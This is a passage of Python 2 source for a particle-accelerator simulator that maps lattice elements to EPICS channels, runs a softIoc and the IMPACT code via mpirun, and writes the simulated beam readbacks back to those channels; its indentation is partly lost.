        VirtualAccelerator instance
    """
    # Delegate all validation and assembly to the factory.
    return VirtualAcceleratorFactory(layout, **kwargs).build()
class VirtualAcceleratorFactory(object):
"""Prepare a VirtualAccelerator for execution.
The main purpose of this class is to process the accelerator
description and configure the VirtualAccelerator for proper
exection.
"""
    def __init__(self, layout, **kwargs):
        """Capture the layout and optional configuration keyword arguments.

        Each assignment below goes through the corresponding property setter,
        which validates the value's type.
        """
        self.layout = layout
        self.config = kwargs.get("config", None)
        self.settings = kwargs.get("settings", None)
        self.channels = kwargs.get("channels", None)
        self.start = kwargs.get("start", None)
        self.end = kwargs.get("end", None)
        self.data_dir = kwargs.get("data_dir", None)
        self.work_dir = kwargs.get("work_dir", None)
        # NOTE(review): the ``machine`` property defined below is never
        # initialized here -- reading ``self.machine`` before assigning it
        # would raise AttributeError; confirm whether that is intended.
@property
def layout(self):
return self._layout
@layout.setter
def layout(self, layout):
if not isinstance(layout, SeqElement):
raise TypeError("VirtAccelFactory: 'layout' property much be type SeqElement")
self._layout = layout
@property
def start(self):
return self._start
@start.setter
def start(self, start):
if (start is not None) and not isinstance(start, basestring):
raise TypeError("VirtAccelFactory: 'start' property much be type string or None")
self._start = start
@property
def end(self):
return self._end
@end.setter
def end(self, end):
if (end is not None) and not isinstance(end, basestring):
raise TypeError("VirtAccelFactory: 'end' property much be type string or None")
self._end = end
@property
def config(self):
return self._config
@config.setter
def config(self, config):
if not isinstance(config, Configuration):
raise TypeError("LatticeFactory: 'config' property must be type Configuration")
self._config = config
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
if not isinstance(settings, dict):
raise TypeError("VirtAccelFactory: 'settings' property much be type dict")
self._settings = settings
@property
def channels(self):
return self._channels
@channels.setter
def channels(self, channels):
if not isinstance(channels, list):
raise TypeError("VirtAccelFactory: 'channels' property much be type list")
self._channels = channels
@property
def machine(self):
return self._machine
@machine.setter
def machine(self, machine):
if (machine is not None) and not isinstance(machine, basestring):
raise TypeError("VirtAccelFactory: 'machine' property much be type string or None")
self._machine = machine
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, data_dir):
if (data_dir is not None) and not isinstance(data_dir, basestring):
raise TypeError("VirtAccelFactory: 'data_dir' property much be type string or None")
self._data_dir = data_dir
@property
def work_dir(self):
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
if (work_dir is not None) and not isinstance(work_dir, basestring):
raise TypeError("VirtAccelFactory: 'work_dir' property much be type string or None")
self._work_dir = work_dir
    def _get_config_impact_exe(self):
        # Prefer the executable path from the configuration; fall back to the
        # default "impact" command otherwise.
        if self.config.has_default(CONFIG_IMPACT_EXE_FILE):
            return self.config.getabspath_default(CONFIG_IMPACT_EXE_FILE, cmd=True)
        return _DEFAULT_IMPACT_EXE
    def _findChannel(self, name, field, handle):
        """Return the channel name matching (elemName, elemField, elemHandle).

        Raises RuntimeError when no channel in self.channels matches all
        three keys.
        """
        for channel, props, _ in self.channels:
            if props["elemName"] != name:
                continue
            if props["elemField"] != field:
                continue
            if props["elemHandle"] != handle:
                continue
            # IMPORTANT: Channel names originating from channel finder
            # may be of type 'unicode' instead of 'str'. The cothread
            # library does not have proper support for unicode strings.
            return str(channel)

        raise RuntimeError("VirtAccelFactory: channel not found: '{}', '{}', '{}'".format(name, field, handle))
def build(self):
    """Process the accelerator description and configure the Virtual Accelerator.

    Registers read/write and read-only channels for every supported element
    type in the layout, then returns the configured VirtualAccelerator.

    :return: configured VirtualAccelerator instance
    :raises RuntimeError: if no data directory is available, the channel
        prefix cannot be determined, a required channel is missing, or an
        unsupported element type is encountered
    """
    settings = self.settings
    # Resolve the data directory: explicit property wins, then configuration.
    data_dir = self.data_dir
    if (data_dir is None) and self.config.has_default(CONFIG_IMPACT_DATA_DIR):
        data_dir = self.config.getabspath_default(CONFIG_IMPACT_DATA_DIR)
    if data_dir is None:
        raise RuntimeError("VirtAccelFactory: No data directory provided, check the configuration")
    work_dir = self.work_dir
    impact_exe = self._get_config_impact_exe()
    latfactory = LatticeFactory(self.layout, config=self.config, settings=self.settings)
    latfactory.outputMode = OUTPUT_MODE_DIAG
    # NOTE(review): self.start / self.end are set outside this view --
    # presumably optional element names bounding the lattice region; confirm.
    latfactory.start = self.start
    latfactory.end = self.end
    # Extract the common channel prefix (group 1, e.g. "VA:") from the first
    # channel name of the form "[PREFIX:]ELEM:FIELD:HANDLE".
    m = re.match("(.*:)?(.*):(.*):(.*)", self.channels[0][0])
    if not m:
        raise RuntimeError("VirtAccelFactory: Error determining channel prefix, check channel names")
    if m.group(1) is None:
        chanprefix = None
    else:
        # IMPORTANT: chanprefix must
        # be converted from unicode
        chanprefix = str(m.group(1))
    va = VirtualAccelerator(latfactory, settings, chanprefix, impact_exe, data_dir, work_dir)
    # Register channels per element type; elements with no channels are skipped.
    for elem in self.layout.iter(start=self.start, end=self.end):
        if isinstance(elem, CavityElement):
            # Need to normalize cavity phase settings to 0~360
            settings[elem.name][elem.fields.phase] = _normalize_phase(settings[elem.name][elem.fields.phase])
            va.append_rw(self._findChannel(elem.name, elem.fields.phase, "setpoint"),
                         self._findChannel(elem.name, elem.fields.phase, "readset"),
                         self._findChannel(elem.name, elem.fields.phase, "readback"),
                         (elem.name, elem.fields.phase), desc="Cavity Phase", egu="degree", drvh=360, drvl=0)
            va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, "setpoint"),
                         self._findChannel(elem.name, elem.fields.amplitude, "readset"),
                         self._findChannel(elem.name, elem.fields.amplitude, "readback"),
                         (elem.name, elem.fields.amplitude), desc="Cavity Amplitude", egu="%")
            va.append_elem(elem)
        elif isinstance(elem, SolCorElement):
            # Solenoid with embedded horizontal/vertical corrector coils.
            va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
                         self._findChannel(elem.name, elem.fields.field, "readset"),
                         self._findChannel(elem.name, elem.fields.field, "readback"),
                         (elem.name, elem.fields.field), desc="Solenoid Field", egu="T")  # , drvratio=0.10)
            va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
                         self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
                         self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
                         (elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
                         egu="radian")  # , drvabs=0.001)
            va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
                         self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
                         self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
                         (elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
                         egu="radian")  # , drvabs=0.001)
            va.append_elem(elem)
        elif isinstance(elem, CorElement):
            va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, "setpoint"),
                         self._findChannel(elem.h.name, elem.h.fields.angle, "readset"),
                         self._findChannel(elem.h.name, elem.h.fields.angle, "readback"),
                         (elem.h.name, elem.h.fields.angle), desc="Horizontal Corrector",
                         egu="radian")  # , drvabs=0.001)
            va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, "setpoint"),
                         self._findChannel(elem.v.name, elem.v.fields.angle, "readset"),
                         self._findChannel(elem.v.name, elem.v.fields.angle, "readback"),
                         (elem.v.name, elem.v.fields.angle), desc="Vertical Corrector",
                         egu="radian")  # , drvabs=0.001)
            va.append_elem(elem)
        elif isinstance(elem, BendElement):
            va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
                         self._findChannel(elem.name, elem.fields.field, "readset"),
                         self._findChannel(elem.name, elem.fields.field, "readback"),
                         (elem.name, elem.fields.field), desc="Bend Relative Field", egu="none")  # , drvratio=0.10)
            va.append_elem(elem)
        elif isinstance(elem, QuadElement):
            va.append_rw(self._findChannel(elem.name, elem.fields.gradient, "setpoint"),
                         self._findChannel(elem.name, elem.fields.gradient, "readset"),
                         self._findChannel(elem.name, elem.fields.gradient, "readback"),
                         (elem.name, elem.fields.gradient), desc="Quadrupole Gradient",
                         egu="T/m")  # , drvratio=0.10)
            va.append_elem(elem)
        elif isinstance(elem, SextElement):
            # Hexapole support is not implemented; keep the channel wiring
            # below for when it is.
            _LOGGER.warning("VirtAccelFactory: Hexapole magnet element support not implemented. Ignoring channels.")
            # va.append_rw(self._findChannel(elem.name, elem.fields.field, "setpoint"),
            #             self._findChannel(elem.name, elem.fields.field, "readset"),
            #             self._findChannel(elem.name, elem.fields.field, "readback"),
            #             (elem.name, elem.fields.field), desc="Hexapole Field", egu="T/m^2", drvrel=0.05)
            # va.append_elem(elem)
        elif isinstance(elem, BPMElement):
            # Beam position monitors are read-only diagnostics.
            va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
                         (elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
            va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
                         (elem.name, elem.fields.y), desc="Vertical Position", egu="m")
            va.append_ro(self._findChannel(elem.name, elem.fields.phase, "readback"),
                         (elem.name, elem.fields.phase), desc="Beam Phase", egu="degree")
            va.append_ro(self._findChannel(elem.name, elem.fields.energy, "readback"),
                         (elem.name, elem.fields.energy), desc="Beam Energy", egu="MeV")
            va.append_elem(elem)
        elif isinstance(elem, PMElement):
            # Profile monitors are read-only diagnostics.
            va.append_ro(self._findChannel(elem.name, elem.fields.x, "readback"),
                         (elem.name, elem.fields.x), desc="Horizontal Position", egu="m")
            va.append_ro(self._findChannel(elem.name, elem.fields.y, "readback"),
                         (elem.name, elem.fields.y), desc="Vertical Position", egu="m")
            va.append_ro(self._findChannel(elem.name, elem.fields.xrms, "readback"),
                         (elem.name, elem.fields.xrms), desc="Horizontal Size", egu="m")
            va.append_ro(self._findChannel(elem.name, elem.fields.yrms, "readback"),
                         (elem.name, elem.fields.yrms), desc="Vertical Size", egu="m")
            va.append_elem(elem)
        elif isinstance(elem, (BLMElement, BLElement, BCMElement)):
            # ignore these diagnostic elements for now
            pass
        elif isinstance(elem, (ValveElement, PortElement, StripElement)):
            # ignore these elements with no relevant channels
            pass
        elif isinstance(elem, DriftElement):
            # drift elements have no channels
            pass
        else:
            raise RuntimeError("Unsupported element type: {}".format(type(elem).__name__))
    return va
class VirtualAccelerator(object):
    """VirtualAccelerator executes and manages the
    EPICS IOC process and IMPACT simulation process.
    """
    def __init__(self, latfactory, settings, chanprefix, impact_exe, data_dir, work_dir=None):
        """
        :param latfactory: LatticeFactory used to generate IMPACT input lattices
        :param settings: dict of accelerator settings, keyed by element name then field
        :param chanprefix: common channel (PV) name prefix, or None for no prefix
        :param impact_exe: path of the IMPACT executable
        :param data_dir: directory containing IMPACT data files
        :param work_dir: working directory for execution, or None to use a temp directory
        """
        if not isinstance(latfactory, LatticeFactory):
            raise TypeError("VirtualAccelerator: Invalid type for LatticeFactory")
        self._latfactory = latfactory
        if not isinstance(settings, dict):
            raise TypeError("VirtualAccelerator: Invalid type for accelerator Settings")
        self._settings = settings
        self._chanprefix = chanprefix
        self.impact_exe = impact_exe
        self.data_dir = data_dir
        self.work_dir = work_dir
        self._epicsdb = []  # EPICS record definitions: (record type, pv name, fields)
        self._csetmap = OrderedDict()  # CSET pv -> (RSET pv, READ pv)
        self._elemmap = OrderedDict()  # element name -> element
        self._fieldmap = OrderedDict()  # CSET pv -> (element name, field)
        self._readfieldmap = OrderedDict()  # element name -> {field: READ pv}
        self._noise = 0.001  # relative noise level applied to settings each cycle
        self._started = False
        self._continue = False  # cleared by _stopper to end the _execute loop
        self._rm_work_dir = False  # True when work_dir is a generated temp dir
        self._ioc_process = None
        self._ioc_logfile = None
        self._subscriptions = None  # camonitor subscriptions, closed on cleanup
        self._lock = cothread.Event(False)
@property
def impact_exe(self):
    """str: Path of the IMPACT executable."""
    return self._impact_exe

@impact_exe.setter
def impact_exe(self, impact_exe):
    # Fixed error-message typo: "much be" -> "must be".
    if not isinstance(impact_exe, basestring):
        raise TypeError("VirtualAccelerator: 'impact_exe' property must be type string")
    self._impact_exe = impact_exe
@property
def data_dir(self):
    """str: Directory containing the IMPACT data files."""
    return self._data_dir

@data_dir.setter
def data_dir(self, data_dir):
    # Fixed error-message typo: "much be" -> "must be".
    if not isinstance(data_dir, basestring):
        raise TypeError("VirtualAccelerator: 'data_dir' property must be type string")
    self._data_dir = data_dir
@property
def work_dir(self):
    """str or None: Working directory; None means a temp dir is created."""
    return self._work_dir

@work_dir.setter
def work_dir(self, work_dir):
    # Fixed error-message typo: "much be" -> "must be".
    if (work_dir is not None) and not isinstance(work_dir, basestring):
        raise TypeError("VirtualAccelerator: 'work_dir' property must be type string or None")
    self._work_dir = work_dir
def append_rw(self, cset, rset, read, field, desc="Element", egu="", prec=5, drvh=None, drvl=None, drvabs=None,
              drvrel=None, drvratio=None):
    """Append a set of read/write channels to this virtual accelerator.

    The algorithm to set EPICS DRVH/DRVL is as:
    - if absolute limit (drvabs) is given, use absolute
    - or if relative limit (drvrel) is given, use relative
    - or if a ratio (drvratio) is given, use ratio
    - otherwise, no limit.

    :param cset: pv name of set point
    :param rset: pv name of read back for set point
    :param read: pv name of read back
    :param field: tuple with element name and field
    :param desc: element description
    :param egu: EPICS record engineering unit
    :param prec: EPICS display precision
    :param drvh: explicit high drive limit (overridden by drvabs/drvrel/drvratio)
    :param drvl: explicit low drive limit (overridden by drvabs/drvrel/drvratio)
    :param drvabs: absolute driven limit with +-abs(drvabs)
    :param drvrel: relative driven limit, value +- abs(drvrel)
    :param drvratio: driven ratio of setting point value * (1 +- ratio)
    :raises RuntimeError: if the virtual accelerator has already been started
    """
    if self.is_started():
        raise RuntimeError("VirtualAccelerator: Cannot append RW channel when started")
    val = self._settings[field[0]][field[1]]
    if drvabs is not None:
        drvh = abs(drvabs)
        drvl = -abs(drvabs)
    elif drvrel is not None:
        # BUGFIX: this branch previously used abs(drvabs), which is always
        # None here and raised TypeError whenever drvrel was supplied.
        drvh = val + abs(drvrel)
        drvl = val - abs(drvrel)
    elif drvratio is not None:
        drvh = val + abs(val * drvratio)
        drvl = val - abs(val * drvratio)
    self._epicsdb.append(("ao", cset, OrderedDict([
        ("DESC", "{} Set Point".format(desc)),
        ("VAL", val),
        ("DRVH", drvh),
        ("DRVL", drvl),
        ("PREC", prec),
        ("EGU", egu)
    ])))
    self._epicsdb.append(("ai", rset, OrderedDict([
        ("DESC", "{} Set Point Read Back".format(desc)),
        ("VAL", val),
        ("PREC", prec),
        ("EGU", egu)
    ])))
    self._epicsdb.append(("ai", read, OrderedDict([
        # BUGFIX: description was missing the .format(desc) call, producing
        # a literal "{} Read Back" in the EPICS database.
        ("DESC", "{} Read Back".format(desc)),
        ("VAL", val),
        ("PREC", prec),
        ("EGU", egu)
    ])))
    self._csetmap[cset] = (rset, read)
    self._fieldmap[cset] = field
def append_ro(self, read, field, desc="Element", egu="", prec=5):
    """Append a read-only channel to this virtual accelerator.

    :param read: pv name of read back
    :param field: tuple with element name and field
    :param desc: element description
    :param egu: EPICS record engineering unit
    :param prec: EPICS display precision
    :raises RuntimeError: if the virtual accelerator has already been started
    """
    if self.is_started():
        raise RuntimeError("VirtualAccelerator: Cannot append RO channel when started")
    record = OrderedDict([
        ("DESC", "{} Read Back".format(desc)),
        ("VAL", "0.0"),
        ("PREC", prec),
        ("EGU", egu)
    ])
    self._epicsdb.append(("ai", read, record))
    # Index the read-back PV by element name then field for later updates.
    self._readfieldmap.setdefault(field[0], OrderedDict())[field[1]] = read
def append_elem(self, elem):
    """Register an accelerator element with this virtual accelerator.

    :param elem: layout element; indexed by its ``name`` attribute
    :raises RuntimeError: if the virtual accelerator has already been started
    """
    if self.is_started():
        raise RuntimeError("VirtualAccelerator: Cannot append element when started")
    self._elemmap[elem.name] = elem
def is_started(self):
    """Return whether the virtual accelerator has been started."""
    return self._started
def start(self, raise_on_wait=False):
    """Start the virtual accelerator. Spawn a new cothread to handle execution.

    :param raise_on_wait: forwarded to the executer cothread's Spawn so that
        exceptions propagate to wait() -- assumed; confirm against cothread docs
    """
    _LOGGER.debug("VirtualAccelerator: Start")
    # Block until _starter has validated directories and spawned the executer.
    cothread.Spawn(self._starter, raise_on_wait, raise_on_wait=True).Wait()
def _starter(self, raise_on_wait):
    """Validate directories and launch the executer cothread.

    Runs inside a cothread spawned by start().

    :raises RuntimeError: if already started, the data directory is missing,
        or the working directory already exists
    """
    _LOGGER.debug("VirtualAccelerator: Start (cothread)")
    if self._started:
        raise RuntimeError("VirtualAccelerator: Already started")
    if not os.path.isdir(self.data_dir):
        raise RuntimeError("VirtualAccelerator: Data directory not found: {}".format(self.data_dir))
    if self.work_dir is not None and os.path.exists(self.work_dir):
        raise RuntimeError("VirtualAccelerator: Working directory already exists: {}".format(self.work_dir))
    self._started = True
    self._continue = True
    # NOTE: this rebinds self._executer from the bound method to the Spawn
    # handle (the method is still resolved first, as the Spawn target).
    # wait() calls .Wait() on the handle; _executer() resets it to None.
    self._executer = cothread.Spawn(self._executer, raise_on_wait=raise_on_wait)
def stop(self):
    """Stop the virtual accelerator.
    Spawn a new cothread to stop gracefully.
    """
    _LOGGER.debug("VirtualAccelerator: Stop")
    # Block until _stopper has signalled the executer loop to exit.
    cothread.Spawn(self._stopper, raise_on_wait=True).Wait()
def _stopper(self):
    """Signal the executer loop to exit. Runs inside a cothread spawned by stop()."""
    _LOGGER.debug("VirtualAccelerator: Stop (cothread)")
    if self._started:
        _LOGGER.debug("VirtualAccelerator: Initiate shutdown")
        # Clearing the flag makes the _execute loop exit at its next check;
        # cleanup then happens in _executer's finally block.
        self._continue = False
    # self._executer.Wait()
def wait(self, timeout=None):
    """Wait for the virtual accelerator to stop

    :param timeout: maximum wait time in seconds, or None to wait indefinitely
    """
    if self._started:
        # _starter rebound self._executer to the Spawn handle, so Wait()
        # blocks until the executer cothread has finished.
        self._executer.Wait(timeout)
def _executer(self):
    """Executer method wraps the call to _execute and ensures
    proper clean up of connections and processes.
    """
    _LOGGER.debug("VirtualAccelerator: Execute (cothread)")
    try:
        self._execute()
    finally:
        # Cleanup runs regardless of how _execute exits (normal stop or error).
        _LOGGER.info("VirtualAccelerator: Cleanup")
        if self._subscriptions is not None:
            _LOGGER.debug("VirtualAccelerator: Cleanup: close connections")
            for sub in self._subscriptions:
                sub.close()
            self._subscriptions = None
        if self._ioc_process is not None:
            _LOGGER.debug("VirtualAccelerator: Cleanup: terminate IOC process")
            self._ioc_process.terminate()
            self._ioc_process.wait()
            self._ioc_process = None
        if self._ioc_logfile is not None:
            _LOGGER.debug("VirtualAccelerator: Cleanup: close IOC log file")
            self._ioc_logfile.close()
            self._ioc_logfile = None
        if self._rm_work_dir:
            # Only remove the working directory if it was a generated temp dir.
            _LOGGER.debug("VirtualAccelerator: Cleanup: remove work directory")
            shutil.rmtree(self.work_dir)
        # Reset state so the virtual accelerator can be started again
        # (also releases the Spawn handle bound by _starter).
        self._executer = None
        self._continue = False
        self._started = False
def _execute(self):
    """Execute the virtual accelerator. This includes the following:
    1. Creating a temporary working directory for execution of IMPACT.
    2. Setup the working directory by symlinking from the data directory.
    3. Writing the EPICS DB to the working directory (va.db).
    4. Starting the softIoc and channel initializing monitors.
    5. Add noise to the settings for all input (CSET) channels.
    6. Generate the IMPACT lattice file in working directory (test.in).
    7. Execute IMPACT simulation and read the output files (fort.??).
    8. Update the READ channels of all devices.
    9. Update the RSET channels of input devices.
    10. Repeat from step #5.
    """
    _LOGGER.debug("VirtualAccelerator: Execute virtual accelerator")
    if self._chanprefix is None:
        chanprefix = ""
    else:
        chanprefix = self._chanprefix
    # Add channel for sample counting
    sample_cnt = chanprefix + "SVR:CNT"
    self._epicsdb.append(("ai", sample_cnt, OrderedDict([
        ("DESC", "Sample counter for scan client"),
        ("VAL", 0)
    ])))
    # Add channel for VA configuration and control
    channoise = chanprefix + "SVR:NOISE"
    self._epicsdb.append(("ao", channoise, OrderedDict([
        ("DESC", "Noise level of Virtual Accelerator"),
        ("VAL", 0.001),
        ("PREC", 5)
    ])))
    chanstat = chanprefix + "SVR:STATUS"
    self._epicsdb.append(("bi", chanstat, OrderedDict([
        ("DESC", "Status of Virtual Accelerator"),
        ("VAL", 1),
        ("ZNAM", "ERR"),
        ("ONAM", "OK"),
        ("PINI", "1")
    ])))
    chancharge = chanprefix + "SVR:CHARGE"
    self._epicsdb.append(("ai", chancharge, OrderedDict([
        ("DESC", "Q/M of Virtual Accelerator"),
        ("VAL", 0.0),
        ("PREC", 5)
    ])))
    # Create (or generate) the working directory; only generated temp
    # directories are removed during cleanup.
    if self.work_dir is not None:
        os.makedirs(self.work_dir)
        self._rm_work_dir = False
    else:
        self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)
        self._rm_work_dir = True
    _LOGGER.info("VirtualAccelerator: Working directory: %s", self._work_dir)
    # input file paths
    epicsdbpath = os.path.join(self.work_dir, "va.db")
    latticepath = os.path.join(self.work_dir, "test.in")
    modelmappath = os.path.join(self.work_dir, "model.map")
    # output file paths
    fort18path = os.path.join(self.work_dir, "fort.18")
    fort24path = os.path.join(self.work_dir, "fort.24")
    fort25path = os.path.join(self.work_dir, "fort.25")
    epicslogpath = os.path.join(self.work_dir, "softioc.log")
    if os.path.isabs(self.data_dir):
        abs_data_dir = self.data_dir
    else:
        abs_data_dir = os.path.abspath(self.data_dir)
    # Symlink each data file into the working directory.
    for datafile in os.listdir(abs_data_dir):
        srcpath = os.path.join(abs_data_dir, datafile)
        destpath = os.path.join(self.work_dir, datafile)
        if os.path.isfile(os.path.join(abs_data_dir, datafile)):
            os.symlink(srcpath, destpath)
            _LOGGER.debug("VirtualAccelerator: Link data file %s to %s", srcpath, destpath)
    with open(epicsdbpath, "w") as outfile:
        self._write_epicsdb(outfile)
    # Start the EPICS soft IOC serving the generated database.
    self._ioc_logfile = open(epicslogpath, "w")
    self._ioc_process = _Cothread_Popen(["softIoc", "-d", "va.db"], cwd=self.work_dir,
                                        stdout=self._ioc_logfile, stderr=subprocess.STDOUT)
    # Monitor the noise channel and all CSET channels for client updates.
    self._subscriptions = []
    self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))
    self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))
    # Main simulation loop: runs until _stopper clears self._continue.
    while self._continue:
        # update the RSET channels with new settings
        for cset in self._csetmap.items():
            name, field = self._fieldmap[cset[0]]
            catools.caput(cset[1][0], self._settings[name][field])
        settings = self._copy_settings_with_noise()
        self._latfactory.settings = settings
        lattice = self._latfactory.build()
        catools.caput(chancharge, lattice.initialCharge)
        with open(latticepath, "w") as outfile:
            with open(modelmappath, "w") as mapfile:
                lattice.write(outfile, mapstream=mapfile)
        start = time.time()
        # Remove stale output files so a failed run is not mistaken for success.
        if os.path.isfile(fort18path):
            os.remove(fort18path)
        if os.path.isfile(fort24path):
            os.remove(fort24path)
        if os.path.isfile(fort25path):
            os.remove(fort25path)
        impact_process = _Cothread_Popen(["mpirun", "-np", str(lattice.nprocessors),
                                          str(self.impact_exe)], cwd=self.work_dir,
                                         stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        (stdout, _, status) = impact_process.communicate()
        # The virtual accelerator shutdown is likely to occur while IMPACT is executing,
        # so check if virtual accelerator has been stopped before proceeding.
        if not self._continue:
            break
        _LOGGER.info("VirtualAccelerator: IMPACT execution time: %f s", time.time() - start)
        if status == 0:
            catools.caput(chanstat, _VA_STATUS_GOOD)
        else:
            _LOGGER.warning("VirtualAccelerator: IMPACT exited with non-zero status code: %s\r\n%s", status, stdout)
            catools.caput(chanstat, _VA_STATUS_BAD)
        # Load IMPACT output files: fort.18 (phase/energy), fort.24 (x),
        # fort.25 (y). Missing files mark the run as bad but do not abort.
        if os.path.isfile(fort18path):
            fort18 = numpy.loadtxt(fort18path, usecols=(0, 1, 3))
            fort18length = fort18.shape[0]
        else:
            _LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort18path)
            catools.caput(chanstat, _VA_STATUS_BAD)
            fort18length = 0
        if os.path.isfile(fort24path):
            fort24 = numpy.loadtxt(fort24path, usecols=(1, 2))
            fort24length = fort24.shape[0]
        else:
            _LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort24path)
            catools.caput(chanstat, _VA_STATUS_BAD)
            fort24length = 0
        if os.path.isfile(fort25path):
            fort25 = numpy.loadtxt(fort25path, usecols=(1, 2))
            fort25length = fort25.shape[0]
        else:
            _LOGGER.warning("VirtualAccelerator: IMPACT output not found: %s", fort25path)
            catools.caput(chanstat, _VA_STATUS_BAD)
            fort25length = 0
        # Collect the names of elements expected to produce output rows.
        # NOTE(review): itype -28 appears to mark diagnostic output elements
        # in the IMPACT lattice -- confirm against the lattice generator.
        output_map = []
        for elem in lattice.elements:
            if elem.itype in [-28]:
                output_map.append(elem.name)
        output_length = len(output_map)
        if fort18length < output_length:
            _LOGGER.warning("VirtualAccelerator: IMPACT fort.18 length %s, expecting %s",
                            fort18length, output_length)
            catools.caput(chanstat, _VA_STATUS_BAD)
        if fort24length < output_length:
            _LOGGER.warning("VirtualAccelerator: IMPACT fort.24 length %s, expecting %s",
                            fort24length, output_length)
            catools.caput(chanstat, _VA_STATUS_BAD)
        if fort25length < output_length:
            _LOGGER.warning("VirtualAccelerator: IMPACT fort.25 length %s, expecting %s",
                            fort25length, output_length)
            catools.caput(chanstat, _VA_STATUS_BAD)
        def get_phase(idx):
            # IMPACT computes the phase in radians,
            # need to convert to degrees for PV.
            return _normalize_phase(2.0 * fort18[idx, 1] * (180.0 / math.pi))
        # Publish simulation results to the read-back PVs.
        for idx in xrange(min(fort18length, fort24length, fort25length)):
            elem = self._elemmap[output_map[idx]]
            if isinstance(elem, BPMElement):
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
                catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
                catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
                catools.caput(self._readfieldmap[elem.name][elem.fields.phase], get_phase(idx))
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
                catools.caput(self._readfieldmap[elem.name][elem.fields.energy], fort18[idx, 2])
            elif isinstance(elem, PMElement):
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
                catools.caput(self._readfieldmap[elem.name][elem.fields.x], fort24[idx, 0])
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
                catools.caput(self._readfieldmap[elem.name][elem.fields.y], fort25[idx, 0])
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
                catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], fort24[idx, 1])
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
                catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], fort25[idx, 1])
            else:
                _LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
                                type(elem).__name__)
        # Write the default error value to the remaing output PVs.
        for idx in xrange(min(fort18length, fort24length, fort25length), output_length):
            elem = self._elemmap[output_map[idx]]
            if isinstance(elem, BPMElement):
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.phase], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.energy], _DEFAULT_ERROR_VALUE)
            elif isinstance(elem, PMElement):
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.x], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.y], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.xrms], _DEFAULT_ERROR_VALUE)
                _LOGGER.debug("VirtualAccelerator: Update read: %s to %s",
                              self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
                catools.caput(self._readfieldmap[elem.name][elem.fields.yrms], _DEFAULT_ERROR_VALUE)
            else:
                _LOGGER.warning("VirtualAccelerator: Output from element type not supported: %s",
